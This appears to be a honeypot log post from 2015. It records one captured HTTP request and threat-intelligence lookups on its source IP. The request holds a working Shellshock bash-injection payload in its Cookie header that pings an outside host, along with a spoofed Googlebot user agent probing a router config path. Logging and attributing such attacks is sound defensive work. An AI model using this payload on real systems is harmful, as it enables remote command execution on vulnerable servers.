Monday, 21 September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt